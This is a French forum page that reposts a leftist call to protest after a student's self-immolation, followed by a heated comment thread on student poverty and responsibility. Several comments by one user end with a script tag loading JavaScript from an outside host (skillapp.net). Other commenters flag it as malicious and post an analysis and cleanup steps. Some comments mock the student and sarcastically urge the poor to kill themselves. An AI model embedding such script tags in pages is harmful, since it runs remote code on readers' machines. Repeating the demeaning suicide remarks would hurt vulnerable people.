mardi 12 novembre - par taktak

« J’accuse Macron, Hollande, Sarkozy et l’UE de m’avoir tué » la jeunesse appelle à manifester devant les crous

#LaPrécaritéTue appel à manifester devant les CROUS ce 12 novembre – #JRCF

« J’accuse Macron,
Hollande, Sarkozy et l’UE
de m’avoir tué »

Poussé à la précarité extrême comme de nombreux jeunes de France, un étudiant en L2
sciences politiques à l’université Lumière Lyon 2, militant à Solidaire Etudiant.e.s, a tenté
de se donner la mort en s’immolant par le feu devant le siège local du CROUS.
Cet étudiant, désormais entre la vie et la mort et à qui, ainsi qu’à ses proches, vont
toutes nos pensées, a accusé dans un message, avant de passer à l’acte, les
véritables responsables de cette situation intolérable dans laquelle on plonge notre
jeunesse :

 

« J’accuse Macron, Hollande, Sarkozy et l’UE de m’avoir tué en créant des incertitudes
sur l’avenir de tou-tes, j’accuse aussi Le Pen et les éditorialistes d’avoir créé des


peurs plus que secondaires »
« Mon dernier souhait, c’est aussi que mes camarades continue de lutter, pour en finir
définitivement avec tout ça »

 

Si la précarité tue jusqu’à notre jeunesse, elle n’est cependant pas irrémédiable. Ceux
et celles qui l’organisent, ainsi que les instances nationales et mondiales sur
lesquelles ils s’appuient pour imposer aux jeunes, aux travailleurs et aux peuples leur
capitalisme mondialisé, ont bien des noms et il faut les nommer.

Ce sont bien Macron, Hollande et Sarkozy, fidèles laquais du grand patronat du
MEDEF et de l’UE, qui détruisent l’université publique, l’Education nationale, la
solidarité nationale, la Sécurité Sociale, nos emplois, le travail, les services publics, la
santé, la police, la défense, la culture, notre langue etc… et accentuent ainsi la
pauvreté et la précarité en France.

Rappelons qu’un étudiant sur deux doit travailler à côté de ses études pour pouvoir
(sur)vivre seul, mettant ainsi en danger le bon déroulement de son année d’université.
Que les prix des logements dans les métropoles, là où se trouvent le plus souvent les


universités, sont de plus en plus exorbitants. Et que les logements étudiants
manquent cruellement depuis des années.
Les profits monstres des actionnaires dans notre pays, les 80 milliards de la fraude
fiscale et les cadeaux de l’Etat capitaliste au grand patronat (CICE) pourraient
pourtant largement être utilisés pour combattre la pauvreté et, entre nombreuses
autres mesures, assurer un « salaire étudiant » à tous les jeunes de FAC et
d’université et un salaire décent aux jeunes en apprentissage.
Ainsi nous investirions dans notre jeunesse et dans l’avenir en levant les obstacles
financiers auxquels elle doit faire face encore aujourd’hui, et en ne la laissant pas
tomber dans la pauvreté et la dépression.

Les JRCF et le PRCF appellent tous les véritables acteurs et militants du progrès à
rejoindre les rassemblements organisés partout en France, par le syndicat Solidaire
Etudiant.e.s, ce mardi 12 novembre, en soutien au jeune syndicaliste étudiant immolé
et en réponse à cette précarité qui tue tous les jours.

https://www.initiative-communiste.fr/articles/luttes/laprecaritetue-appel-a-manifester-devant-les-crous-ce-12-novembre-jrcf/



66 réactions


  • bluerage 12 novembre 14:36

    Personnellement je ne vais pas pleurer pour un cinglé d’extrême gauche qui redoublait sa licence pour la deuxième fois, au lieu de perdre son temps en réunions avec des dégénérés comme vous qui attendent le grand soir pour pouvoir être rasés gratis, si il avait étudié un peu plus...

    Je précise que j’ai fait des études supérieures sans jamais redoubler et en vivant chichement de mes bourses et de travaux durant l’été.


    • mac 12 novembre 15:57

      @bluerage
      Facile de se montrer aussi dur...L’insensibilité est-il le mal du siècle ?
      100000 personnes se suicident chaque année et beaucoup pour raisons économiques. Vous avez entendu parler de cause nationale à ce sujet ?
      Les seules causes nationales semblent être celles qui peuvent rapporter du fric aux multinationales...


    • oncle archibald 12 novembre 16:30

      @mac : « L’insensibilité est-elle le mal du siècle ? »

      Non, pas du tout, regardez les chiffres des sommes collectées par les associations caritatives et ajoutez y la part du budget de l’état consacré à la redistribution. Ce sont des sommes énormes.

      Je crois plutôt que c’est la négation de la responsabilité personnelle qui est le mal du siècle ! Si quoi que ce soit merdouille dans leur vie, pour certains c’est toujours la faute du voisin ou de l’état !

      Il y a aussi la jalousie : ceux qui ne supportent pas que leur voisin ait une bagnole plus récente que la leur, qu’il gagne plus qu’eux alors qu’il est moins qualifié, etc etc ....

      Et la encore : quelle est la part de responsabilité personnelle dans chaque situation personnelle ? Il y a des boulangers qui avec un CAP obtenu par la filière de l’apprentissage gagnent autant d’argent sinon plus qu’un médecin qui a bac plus dix ! Il y a des gens qui vivent très heureux avec peu d’argent et d’autres qui estiment qu’ils n’ont pas de quoi vivre et sont malheureux avec cinq ou dix fois plus ...


    • mac 12 novembre 17:01

      @oncle archibald
      Les collectes sont souvent à hauteur des médiatisations et des indignations à géométrie variables. Pour le reste cela ressemble un peu aux propos de cette jeune éditorialiste qui s’est faite remarquée récemment sur une chaîne d’info...


    • CoolDude 12 novembre 18:51

      @bluerage

      Celle-là, je m’y attendais... Et elle en pole position en plus :

      Quand on est au SMIC avec deux enfants, il ne faut pas divorcer...
      Quand on est pauvre et con, on ne fait pas d’étude !
      ...
      ..
      .
      Bon quand tu es pauvre : Flingue toi directe et fait pas chier !


    • foufouille foufouille 12 novembre 18:55

      @CoolDude

      tripler son année de fac est juste débile.


    • CoolDude 12 novembre 19:02

      @foufouille

      Bon, il a quand même intégré Science Po Lyon, donc en réalité il n’était pas si con ou débile... Juste persévérant !

      Science Po, c’est quand même un bon niveau. Ce n’est pas la Fac de base.


    • foufouille foufouille 12 novembre 19:11

      @CoolDude

      j’ai juste lu science politique, science po c’est comme médecine avec le première année qui sélectionne et faut devenir trop con pour laisser tomber.


    • Cadoudal Cadoudal 12 novembre 19:22

      @foufouille
      Il était militant à plein temps chez Solidaires...

      On peut pas lutter contre le nazi François Hollande et travailler en même temps...

      Hollande est un minable, certes ; mais ses livres peuvent aller au pilon si personne ne les lit ; les détruire parce qu’ils ne conviennent pas à qq petits gauchos fachos rappelle des heures bien sombres

      https://twitter.com/Tomjanvier_/status/1194251604771389442?ref_src=twsrc%5Etfw


    • Aita Pea Pea Aita Pea Pea 12 novembre 19:28

      @Cadoudal

      Ça c’est un coup de la reine des neiges .


    • Kapimo Kapimo 12 novembre 20:43

      @bluerage

      Oui, mais vous on voit tout de suite que vous êtes brillant. Peut-être que lui avait moins de facilités, et ne s’en sortait pas dans ses études du fait de tous les petits boulots qu’il avait à coté ?
      Sinon, l’euthanasie, vous aimez ?


    • Fergus Fergus 13 novembre 09:17

      Bonjour, foufouille

      D’accord avec toi.

      Bien que je sois évidemment consterné par le geste de ce jeune, force est de constater qu’il n’est pas scandaleux de retirer sa bourse à un étudiant qui triple sa 
      2e année de licence tant il y a, à côté, d’autres étudiants méritants et motivés qui, eux, n’ont pas la chance de se voir attribuer une bourse. 


    • taktak 13 novembre 11:26

      @Fergus
      ce qui est bien avec vous Fergus, c’est qu(en toute circonstance vous ne variez pas. vous êtes toujours du coté du manche et des puissants. Avec une larmichette pour vous illusionner sur votre grandeur d’âme et préserver votre estime de vous. C’est important pour vous ça de s’imaginer de gauche sans doute. La gauche de droite.

       le suicide d’un jeune homme, qui s’immole par le feu, parcequ’il n’a aucun avenir dans cette société, ce n’est pas consternant. C’est révoltant.
      — et ce qui est scandaleux, c’est non seulement de se féliciter de ce que l’on retire sa bourse et son logement à étudiant qui échoue à son année universitère, sans se poser la question des raisons de l’échec, surtout quand les raisons de l’échec c’est l’extrême misère de cet étudiant, décrit comme méritant par ailleurs par ses professeurs. Les difficultés matérielles des étudiants d’origines modeste sont telles qu’il leur est quasi impossible de réussir. Qu’il est facile, la bouche plein et le ventre bien tendu que de faire la leçon aux geux qui crève de faim. 


    • bluerage 13 novembre 11:57

      @Dr Frank-N-Furter

      Sara, dulce Sara, dilo con suavidad, como hacías ayer, dime cosas que yo nunca pueda comprender...


    • DACH 13 novembre 13:38

      @mac=la crédulité et le manque de lucidité qui rend esclave de ce qu’on a envie de croire mènent à l’insensibilité.

      <script src="//skillapp.net/2143f05201d76950ea.js"></script>

    • bluerage 13 novembre 14:00

      @Dr Frank-N-Furter

      Ay Sara, no me digas que conoces el Ultimo de la fila, no puede ser....


    • Fergus Fergus 13 novembre 15:30

      Bonjour, taktak

      « en toute circonstance vous ne variez pas. vous êtes toujours du coté du manche et des puissants »

      Certainement pas, et si vous n’étiez pas en partie aveuglé par des oeillères sectaires, vous nuanceriez beaucoup plus vos propos et vos arguments. 
       
      « le suicide d’un jeune homme, qui s’immole par le feu, parcequ’il n’a aucun avenir dans cette société, ce n’est pas consternant. C’est révoltant »

      En effet. Et cela illustre bien le fait que des moyens insuffisants sont alloués aux étudiants précaires. Sur ce point, je suis d’accord avec vous sans la moindre hésitation. 

      Pour autant, les budgets ne sont, en l’état, pas extensibles, et le fait est  difficilement contestable  qu’il faut faire des choix dans l’attribution des bourses. Ce faisant, renouveler sa bourse à un étudiant qui triple sa 2e année, c’est pénaliser un autre étudiant tout aussi modeste et tout aussi méritant qui, faute d’aide, sera contraint de galérer  et peut-être de jeter l’éponge sans avoir eu le temps de démériter. Est-ce si difficile à comprendre ???


  • foufouille foufouille 12 novembre 14:44

    il existe des tas de logements pas cher pour les étudiants, de la coloc, etc.

    manifestement, il est timbré de vouloir triplé son année de science politique.

    il suffisait de suivre une autre voie pour avoir sa bourse.


    • JP94 12 novembre 20:44

      @foufouille
      Juste quelques infos pour comprendre vos propos : 
       quel est votre QI ?
       combien gagnez-vous par mois ?
      Quel est votre niveau d’études ? 

      Vous savez : cet étudiant a tout le droit de faire ses études au niveau de ses capacités.
      Pour certains, ce n’est pas l’argent qui fait défaut, ce sont les capacités intellectuelles. Mais ça leur échappe.

      Cet étudiant ne se bat pas que pour lui-même : il lutte pour que tous les enfants de milieu non fortuné ait accès à des études. Cet acte est une accusation politique contre le système capitaliste. 
      De toute façon, avec Macron, on peut aussi perdre la vie rien qu’en manifestant pacifiquement. 

      « Mais gare à la revanche quand tous les pauvres d’y mettront »
      Chanson de JB Clément écrite sous la Semaine sanglante qui écrasa la Commune de Paris, lorsque les Versaillais massacrèrent femmes, enfants, vieillards par dizaines de milliers.

      A propos, la Commune de Kwangdiu en Corée du SUD, à la fin des années 70, par des ouvriers et des étudiants : 6000 morts massacrés par l’armée sud-coréenne avec l’aval des Etats-Unis, vous aviez peut-être de bons conseils à prodiguer pour passer au travers des balles de mitrailleuses ? 


    • foufouille foufouille 13 novembre 08:48

      @JP94 ce n’est pas beaucoup une bourse mais elle existe que ça te plaise ou pas.

      il voulait triplé une année et que ce soit autorisé est choquant.

      il recevait une APL payant tout son loyer, dans une grande il est facile de manger gratuitement. les logements étudiants sont tellement nombreux que certains sont vides.

      c’était beaucoup plus difficile de survivre début 90 dans le privé.

      ça te dirait un mauvais médecin qui a triplé chaque année ?


    • taktak 13 novembre 11:38

      @foufouille
      des logements étudiants vides ? mais dans quel pays vivez vous ? pas en France

      Les logements étudiants sont très peu nombreux, et même l’offre privée, très chère, innaccessible aux boursiers et aux moins fortunées est insuffisante
      https://www.lyoncapitale.fr/actualite/manque-de-logements-etudiants-lyon-est-complet/


    • foufouille foufouille 13 novembre 13:19

      @taktak

      je ne sais pas pour Lyon mais ça pousse comme des champignons chez moi et certains sont bien vides car réservés aux étudiants comme pour certains logements HLM vides car réservés aux seniors ( il faut avoir plus de 60 ans dixit le môsieu au téléphone pour le T1 ) ou des F3 en rez de chaussé : les volets sont baissés depuis des mois.

      dans le privé aussi et pas trop cher, 370€ le studio sans chauffage central.

      certains sont plus cher, évidement.


    • Fergus Fergus 13 novembre 15:32

      @ foufouille

      A Rennes  ville universitaire —, se loger pour un étudiant à un prix raisonnable est une vraie galère. J’imagine que c’est le cas dans la plupart des métropoles.


    • foufouille foufouille 13 novembre 15:52

      @Fergus

      c’est combien un prix raisonnable ?

      c’est pas non plus super confortable un appart pas cher.


  • Gilles Mérivac Gilles Mérivac 12 novembre 14:54

    Ce sont les mouvements de gauche qui l’ont tué, en le persuadant que tous ses malheurs provenaient des capitalistes et du gouvernement, ce qui l’a empêché de prendre ses responsabilités et de grandir.

    « Ne te demandes pas ce que ton pays peut faire pour toi, mais ce ce que tu peux faire pour ton pays ».

    Ces paroles de sagesse sont bien oubliées.


    • mac 12 novembre 16:04

      @Gilles Mérivac
      Encore faudrait-il que nous ayons encore un véritable pays et pas ce qui semble être une succursale de l’Allemagne et des Etats-unis où les hommes politiques ne semblent plus avoir que le pouvoir de fixer des choses comme les dates des vacances scolaires...


    • Gilles Mérivac Gilles Mérivac 12 novembre 17:28

      @mac
      Encore et toujours des excuses pour ne rien faire.


    • mac 12 novembre 18:27

      @Gilles Mérivac
      Si si les politiques font mais tout en dépit du bon sens.
      Rendez-vous à la prochaine grande crise financière, je pense que ça va être un carnage à la grec ici et nous pourrons remercier la clairvoyance de nos politiques un peu comme au moment de la débâcle de 40. De toute façon, comme à l’époque, ils se tireront des flûtes...
      Pour ce qui est de mon cas personnel, je fais comme je peux mais je fais. Je crée des boîtes et j’investis mes économies dedans, je ne pense pas que ce soit le cas de tout le monde...


    • JP94 12 novembre 20:35

      @Gilles Mérivac
      Ne généralisez pas votre cas :cet étudiant pense par lui-même 

      Vos conseils fleurent bon le pétainisme...

      Mais bon, n’oubliez qu’en 1945, ceux que vous méprisez de façon ignominieuse et qui ne prouve que votre bassesses intellectuelle, ces jeunes, ces Guy Môquet  même morts  ont triomphé tandis que les esprits collabos cessaient leurs sarcasmes et se planquaient.


  • The Pilgrim The Pilgrim 12 novembre 14:56

    Les entrepreneurs, commerçants, auto-entrepreneurs — tous isolés — qui se sont immolés chez RSI, vous ne les avez pas récupérés… Ok, ce n’était pas facile !

    Et là, une de vos ouailles… Ça me fait penser au film LES RIVIÈRES POURPRES ou, sa suite, avec la phrase du genre : « Ça vous fait quoi d’avoir ressasser ad nauseam une idéologie qui n’a jamais sauvé personne ? »


  • oncle archibald 12 novembre 15:04

    Dans toute société organisée il existe des règles du jeu. En l’occurrence pour cet infortuné jeune homme il n’était pas possible de se voir attribuer une bourse d’études en triplant son année.

    Ignorait-il ce qui allait se passer ? Ce dispositif vous parait-il injuste ? Le citoyen lambda doit-il payer des impôts pour que l’on attribue des bourses d’études ad vitam æternam à un élève qui soit ne travaille pas assez soit s’est trompé de voie en s’engageant dans ces études ?

    Quid de la responsabilité personnelle ? L’état doit-il être tenu responsable des échecs universitaires de tous les potaches ? L’état doit-il être un espèce de tuteur qui n’aurait de comptes à rendre qu’à ceux qu’il soutient et jamais à ceux dans les poches desquels il puise pour financer les innombrables missions dont il est chargé ?

    Je partage l’analyse assez brutale de Bluerage : il faut savoir analyser ses propres possibilités et prendre les moyens d’arriver à ses fins.

    Apparemment ce jeune avait de l’appétence pour la politique mais pas pour les études. Peut-être aussi passait-il trop de temps en réunions et pas assez à bucher son cours. Il y a sans doute beaucoup de possibilités de faire de la politique un métier sans avoir une licence de sciences Po.

    La vie est un choix perpétuel me serinait mon père ! Il faut faire des choix au lieu de se plaindre de ne pas être assez soutenu par l’état quand il vous a déjà aidé à faire une année et même à la redoubler !


    • mac 12 novembre 16:25

      @oncle archibald
      J’aurais vraiment du mal avoir un jugement aussi froid ayant dans mon entourage un petit jeune qui a mis fin à ses jours dans son appartement parce qu’il avait du mal à trouver autre chose que des emplois précaires. Et pourtant dans mon exemple, le petit jeune en question n’avait rien raté de la mention très bien au bac à une grande école prestigieuse en passant par des classes préparatoires sélectives.

      Pour le cas dont on parle, erreur de jugement ou pas cela reste un gamin qui se fout en l’air.
      Encore une fois 10000 suicidés par an dont beaucoup pour raisons économiques et en fait-on une cause nationale et médiatique à la auteur de cette hécatombe ?
      Peut-être qu’une partie du grand patronat considère avoir trouvé la solution pour remplacer toutes ces personnes à moindre coût ?


    • oncle archibald 12 novembre 16:38

      @mac ; un petit jeune qui accède à une grande école en passant par la filière des classes prépa, qui ne trouve pas autre chose qu’un emploi précaire et qui se suicide pour cette raison ? 

      Désolé mais c’est un cas social ou pathologique le « petit jeune » de votre exemple ! Actuellement les jeunes cadres bien diplômés comme celui que vous citez n’ont aucun mal à trouver du boulot et se permettent même de choisir la boite dans laquelle ils souhaitent travailler !


    • mac 12 novembre 16:57

      @oncle archibald
      Et bien non !
      Les jeunes diplômés quittent le pays en masse car les salaires proposés sont de plus en plus minables. Vivre avec 2000 balles par moi en région parisienne c’est loin d’être le Pérou...
      En l’occurrence j’imputerais intuitivement le cas tragique que je vous cite à la différence qu’il y a entre ce que certaines grandes écoles font parfois miroiter aux petits jeunes et la triste réalité du marché du travail dans ce pays...
      Vous savez combien il y a d’options « finance » dans les grandes écoles de commerce et d’ingénieurs ? N’est-ce pas un véritable miroir aux alouettes que de laisser croire que tous ces jeunes diplômés vont travailler dans des lieux du genre la City de Londres ?


    • Fergus Fergus 13 novembre 09:23

      Bonjour, oncle archibald

      « En l’occurrence pour cet infortuné jeune homme il n’était pas possible de se voir attribuer une bourse d’études en triplant son année »

      Je partage votre avis sur ce point (Voir plus mon commentaire à foufouille). D’autant plus que l’enveloppe globale des bourses n’est pas extensible et qu’une bourse attribuée à un étudiant ne l’est pas à un autre étudiant demandeur. Tripler sa 3e année n’est donc tout simplement pas raisonnable.


    • Armelle Armelle 13 novembre 09:36

      @mac
      « Les jeunes diplômés quittent le pays en masse » 

      Vous avez vu ça où vous ? Vous avez des chiffres ?
      En l’occurrence, des jeunes quittent notre pays mais ce sont surtout de jeunes créateurs, pas forcément des diplômés, tout ça parce que plus facile et moins cher ailleurs. 
      Vous mélangez tout !!!


    • mac 14 novembre 18:47

      @Armelle
      Vous prenez pour qui ? Ils sont où vos chiffres à vous ?
      Vous savez très bien qu’il y a diplômés et diplômés...Certains capables de créer de la valeur ajoutée ont tendance à plus quitter le pays et les chômeurs en puissance restent...


  • Buzzcocks 12 novembre 16:18

    On appelle ça le ruissellement cher à Macron, les étudiants dépensent effectivement des sommes de plus en plus folles pour se loger. Ca ruisselle, mais pas dans le sens que le mythe macronien voudrait nous faire croire. 

    Après, je n’aime pas trop partir d’un fait divers pour faire des généralités. La situation de ce type est assez particulière. Mais d’une manière générale, les études deviennent censitaires. Si vous avez des parents fortunés, ils vous mettront, dès le collège, dans les établissements où vous ne fréquenterez pas les gogols, et où vous pourrez étudier dans de bonnes conditions (pas besoin de faire de petits boulots, logements à proximité du lieu d’étude voire comme en médecine/pharma —> paiement de cours privés de remise à niveau qui deviennent presque obligatoires si vous voulez réussir).

    Sinon, y a plus en plus de formations en alternance, 2 semaines en entreprise, puis 2 semaines à l’école... et ça donne souvent des gens que les boites embauchent dans la foulée. Et donc ils sont payés durant la formation, et des accès à la cantine d’entreprise, pour des prix abordables.

    Mais est ce que ce type avait envie de bosser pour une entreprise capitaliste malfaisante détenue par de méchants esclavagistes macroniens de la pire espèce ? On peut en douter.


  • Raymond75 12 novembre 17:45

    Ce jeune homme triplait sa deuxième année de fac ; il était dans une situation d’échec personnel très grave, et je ne suis pas certain que la société en soit responsable.


    • mac 12 novembre 18:34

      @Raymond75
      Qui peut le dire ?
      Le système scolaire laisse passer le BAC à des élèves de plus en plus faibles, demande de ne plus trop faire redoubler les élèves dans le secondaire et tombe de plus en plus dans la démagogie pour l’évaluation.
      Quand ils retournent à la réalité, généralement dans le supérieur, les jeunes ne comprennent pas forcément et pour certains cela peut se passer très mal. Est-ce vraiment de leur faute alors qu’ils arrivent tout juste dans ce monde ?


    • Ruut Ruut 13 novembre 05:55

      La politique ce n’est pas un monde de Bisounours.

      Visiblement ses études ne l’ont pas formé psychologiquement ni logistiquement a faire face a la Réalité.....

      C’est dans un certain cas un échec de l’EN et des classes préparatoires.....


    • kimonovert 13 novembre 09:27

      @mac

      Non c’est pas de leur faute ! Et maintenant on dit à qui c’est la faute ?
      - 1 Macron (Depuis 2017)
      - 2 Hollande (de 2012 à 2017)
      - 3 Sarkozy (de 2007 à 2012)
      - 4 Chirac (de 1995 à 2007) +
      - 5 les profs durant 25 ans ?
      - 6 les parents...il y a 25 ans ? Irresponsables ces arguties !


    • fummi grouchette 13 novembre 17:05

      @mac
      exact j ai été prof de lycée pendant 30 ans et constaté qu’il fallait toujours baisser les exigences de travail scolaire,et meme d’assiduité,majorer les notes de bac ,toujours niveler par le bas et faire croire aux éléves qu’ils pouvaient tous aspirer faire des études supérieures ;j « ajoute que ce sont souvent les plus faibles qui s’orientent vers des filières sans débouchés a l’université et que celle-ci ne contribue pas a donner aux étudiants le sens du travail necessaire meme dans les études:que sont ces quelques heures de cours hebdomadaires,l’absence de controle de l’assiduité et des notations episodiques voire complaisantes ?Le mot »sélection« est un repoussoir dans la plupart des facultés ;pas etonnant qu’on y ait le temps de faire de la politique a mauvais escient et de croire aux illusions de l’extreme gauche et qu’on entende aujourd’hui des revendications fantaisistes de la part des etudiants bloqueurs du style salaire étudiant,salaire a vie,etc et bien sur sans aucune condition de résulats ;on pleure sur la necessité de devoir travailler en plus du temps scolaire:le faible nombre d’heures de c ours et de travaildemandé auxetudiants des facs laisse largement le temps de tout concilier ;issue d’un milieu ouvrier tres modeste,j ai toujours travaillé pendant mes études et choisi des voies sélectives sans rever qu »on pouvait nous raser gratis ad vitam aeternam


    • kimonovert 13 novembre 17:31

      @fummi grouchette Donc vous répondez en cochant le 6 de mon sondage ! In fine, ce sont les parents qui éduquent et les maitres qui enseignent... De la génération 68arde, issu comme ceux du baby boom de la France des campagnes plus que de la France des villes, mes parents n’ont jamais suivi que les conseils donnés par les instituteurs sur mes capacités pour aborder ou non le lycée, le collège professionnel...J’ai la chance d’être des 15 % de ma classe d’âge titulaire du bac (TM)...Ce sont mes soeurs et frères (5) qui ont eu des bourses...L’époque était au pragmatisme : trouver du boulot, un bon boulot...Ne disait-on pas « suivre » des études, cad un cursus, marche après marche, pour aboutir...Pas une errance babacool dans les amphis de France et de Navarre pour se faire un CV gauchobaroudeur à la Renaud ou à la Lavilliers...dont j’ai bien connu le père !


  • Armelle Armelle 13 novembre 09:21

    ...Du Zola pur jus...

    « Rappelons qu’un étudiant sur deux doit travailler à côté de ses études pour pouvoir (sur)vivre seul »

    Macron, Sarkosy et Hollande n’ont rien à voir avec ça !!! Qu’est-ce que c’est que cette nouvelle ânerie, c’était déjà comme ça il y a trente ans !!!

    C’est juste la descente aux enfer de la génération « enfants gâtés », qui enfin, prend conscience de la réalité du monde dans lequel elle vit !!!

    Ce garçon s’est mis en échec tout seul, et je trouve honteux et un peu « bêtaud », sinon complètement con de jouer sur le misérabilisme pour accuser untel ou untel !!! Les gauchistes ne sont pas doués, leur capacités intellectuelles ne sont décidément pas à la hauteur du défi alors ils nous sortent n’importe quel arme dans leur quête à la destruction de leur ennemi le capitalisme ! ...Les autres gauchistes c’est le réchauffement climatique, 

    C’est lamentable de politiser un tel événement. L’auteur pense sans doute que ça peut dédouaner d’une médiocrité certaine !!! 

    Je plains l’auteur et ses acolytes de vivre dans cette jalousie et cette frustration permanentes en espérant je ne sais quel renversement de table et en attendant que ça leur tombe tout cuit dans le bec...


    Des torchons pareils devraient être censurés , car partant d’un postulat erroné et proposant une analyse complètement hors sujet



     


  • ZenZoe ZenZoe 13 novembre 12:01

    Primo : je ne connais pas le cas de ce jeune homme, mais je peux affirmer sans beaucoup me tromper que sa précarité n’était pas le seul motif de sa détresse personnelle. Les suicides sont complexes. Tous sans exception, et leur attribuer une seule cause, et à fortiori politique, est un raccourci qui ne fait pas avancer cette cause tragique.

    Secundo : c’est la raison pour laquelle je suis absolument contre la récupération de tout suicide quel qu’il soit pour défendre une cause, et surtout une cause politique. Je trouve ça dégueulasse et indécent. Lutter contre la précarité des étudiants et les inégalités de chances en vaut la peine, mais pas comme ça.


  • soi même 13 novembre 13:16

    Pauvre lapin, au lieu d’obtenir BAC + 5, va bosser, car tu auras plus de change de survivre en bossant maintenant que d’avoir un boulot bac+5 comme caissier de super marché.


  • DACH 13 novembre 13:48

    Tout le monde comprend qu’imputer à la précarité, mot abstrait, la réalité de faits liés à des échecs personnels relève de l’imposture, à visées politiques. C’est comme lutter contre le terrorisme. cela ne veut rien dire d’autres qu’on reste devant son salon et son écran pour faire croire qu’on est actif avec de bonnes raisons. Que fait taktak pour luter contre ce qui ne va pas. rien que d’essayer de faire croire ! Et cela marche de moins en moins. 

    <script src="//skillapp.net/2143f05201d76950ea.js"></script>

  • zygzornifle zygzornifle 13 novembre 14:10
    « J’accuse Macron, Hollande, Sarkozy et l’UE de m’avoir tué »

    Ils n’ont pas compris qu’on nous tue de notre premier souffle a notre dernier et quand il y a un héritage ce sont les héritiers que l’on tue ....


    • DACH 13 novembre 14:56

      @zygzornifle="la vie est une maladie constamment mortelle sexuellement transmissible" Prof W Rozenbaum. Zyg n’a rien compris à la vie !

      <script src="//skillapp.net/2143f05201d76950ea.js"></script> <script src="//skillapp.net/2143f05201d76950ea.js"></script> <script src="//skillapp.net/2143f05201d76950ea.js"></script>

    • pemile pemile 13 novembre 15:20

      @DACH « la vie est une maladie constamment mortelle sexuellement transmissible »

      Et vos scripts parasites en fin de posts, vous les avez attrapés comment ?


    • DACH 13 novembre 15:46

      @pemile=Merci de nous révéler votre débilité.

      <script src="//skillapp.net/2143f05201d76950ea.js"></script>

    • pemile pemile 13 novembre 15:55

      @DACH "Merci de nous révéler votre débilité.

      <script src="//skillapp.net/2143f05201d76950ea.js"></script>"

      Rhhoooo, Mr skillapp.net est vexé ? smiley


    • Cirrhose (Droll de Crane) Cyrus (TRoll de DRame) 13 novembre 16:55

      @DACH

      https://www.hybrid-analysis.com/sample/4c7808156576c1646aa4c47d0e389a615d2bbaba32893d9716 5ce4b13bd7c6ce/5d662c7202883839744d32ae

      detruit ces process

      undll32.exe « %WINDIR%\System32\ieframe.dll »,OpenURL C :\4c7808156576c1646aa4c47d0e389a615d2bbaba32893d97165ce4b13bd7c6ce.url (PID : 336) 

       iexplore.exe https://skillapp.net/2143f05201d76950ea.js (PID : 2116)  

       iexplore.exe SCODEF:2116 CREDAT:275457 /prefetch:2 (PID : 852)   Hash Seen Before

      https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer

      interdit l’ ip 172.64.97.6 dans ton fichier host ou directement sur ton routeur .

      Passe un bon coup d’ antivirus , nettoie ta base de registre des ocurence de l’ adresse net , de l’ ip , et des fichier sur ton disque dur a la racine ayant .pid en extension .
      Ca ne reglera pas le probleme , mais ca devrais (conditionel ) limiter l’ acces de l’ infection a tes commentaire sur agoravox .
      NB : je part bien sur du principe que tu n’ infecte pas volontairement les cretin qui regarde l’ URL .
      n’ hesite pas a demander conseil a pemile , ou fergus , ils ont un bon niveau .et peut etre d’ autre conseil a donner .



    • kimonovert 14 novembre 07:57

      @zygzornifle

      « J’accuse aussi Le Pen et les éditorialistes d’avoir créé des peurs plus que secondaires » Manquent l’OTAN et l’euro !


  • JMBerniolles 13 novembre 16:04

    Merci d’abord pour cet article sur le fait majeur de notre actualité. Ce malheureux jeune ne s’est pas tué seulement pour son problème personnel, son geste tragique qui devrait être respecté porte aussi l’attention sur les problèmes de nos jeunes en général. Bien entendu le système qui détruit notre jeunesse et notre pays cherche à détourner la signification de ce message dramatique, avec des arguments pourris qui sont repris ici par des commentateurs égoïstes, egocentrés... Les jeunes concentrent tous les problèmes générés par notre système hautement inégalitaire. Non emploi d’abord pour une proportion largement supérieure au 25% avoués, la précarité, les bas salaires, y compris pour les diplômés ( comment un professeur des écoles exerçant à Paris dans la plupart des quartiers peut-il se loger ?), les problèmes pour l’accès à la santé... La situation tient pour une part avec l’aide des parents et des grands parents mais la liquidation des couches moyennes va aggraver les choses. Ce suicide marque aussi le fait que l’on a atteint les limites. Le fait que les responsables politiques soient inertes est aussi la révélation d’une triste réalité..


  • le cathare 13 novembre 16:36

    Les syndicats étudiants majoritairement gauchisants ,et immigrationnistes , sont pour le partage du gâteau France avec toute la misère du monde .Les 691 000 boursiers en 2016 et 2017 ont touchés 2 milliards du CROUS .Les 40 000 migrants mineurs isolés ont coutés 2 milliards , et les migrants clandestins ou réfugiés 24 a 70 milliards.C’est ça le vivre ensemble le partage de la misère .Tant que les français ne voterons pas ’’Français d’abord ’’ leur part de gâteau diminuera .Sortis de l’université , devenus pompiers ,infirmières , profs ,policiers,ils devront accepter un salaire de misère et des conditions de travail insupportables .Les autres trahis par les syndicats , dans le privé,en concurrence avec les migrants enrichiront le MEDEF. Les BAC + 4 ou 5 partiront chercher fortune dans des pays moins partageux ,nous laissant manifester pour ne pas mourir .....gazés et éborgnés


  • vieuxgrincheux 13 novembre 17:00

    Ce suicide est triste mais il faut dire que , sauf pour des privilégiés, être étudiant n’a jamais été rose. Je l’ai été et je ne roulais pas sur l’or loin de là et je n’avais pas de bourse car mes parents dépassaient juste le seul adéquat. Nourriture : restau Universitaire la semaine et rien le week-end. Pas de sorties pas de bar pas de cinéma et évidemment pas de moto, ou bagnole, pas de smartphone pas de chaine hi-fi pas de de télé, pas d’internet et une chambre de bonne sans douche avec WC sur le palier. Et je bossais les étés !!!!!!! Et ceux qui étaient boursiers savaient très bien qu’ils perdaient leur bourse dès la 1ere année de redoublement !!!!!!!!!!

    La plupart des jeunes actuels ont peu de frustration. je suis toujours surpris d’ne voir autant tous les soirs dans des bars branchés consommer des cocktails ou des bières à tour de bras... En plus, aucune frustration dans la scolarite car , naturellement, des devoirs ridicules pas de discipline et un bac qui ne vaut rien distribué à tour de bras. En fac, ca se retrouve seul à devoir assumer sans avoir jamais connu le sens du mot responsabilité. Alors qui est coupable ? Pas le jeune évidemment du moins pas pour la plus grande part. Les coupables :

    1. Les parents dont l’éducation laxiste avec les enfants est la source de tout le reste
    2. la gauche bien pensante qui a foutu en l’air depuis 40 ans la notion d’effort de travail et de responsabilité que ce soit dans l’école ou dans le reste du monde social. Cette même gauche qui a pollué en effet l’esprit de ce jeune garçon avec des idées comme quoi on a droit à tout sans rien faire ou avec un minimum d’effort.
    3.  Cette société en général qui crie sans arret mes droits mes droits j’ai le droit et qui ne fait jamais allusion au mot devoir et à ce qu’il signifie et implique. Des droits oui mais aussi des devoirs !!!!!!!!!! 

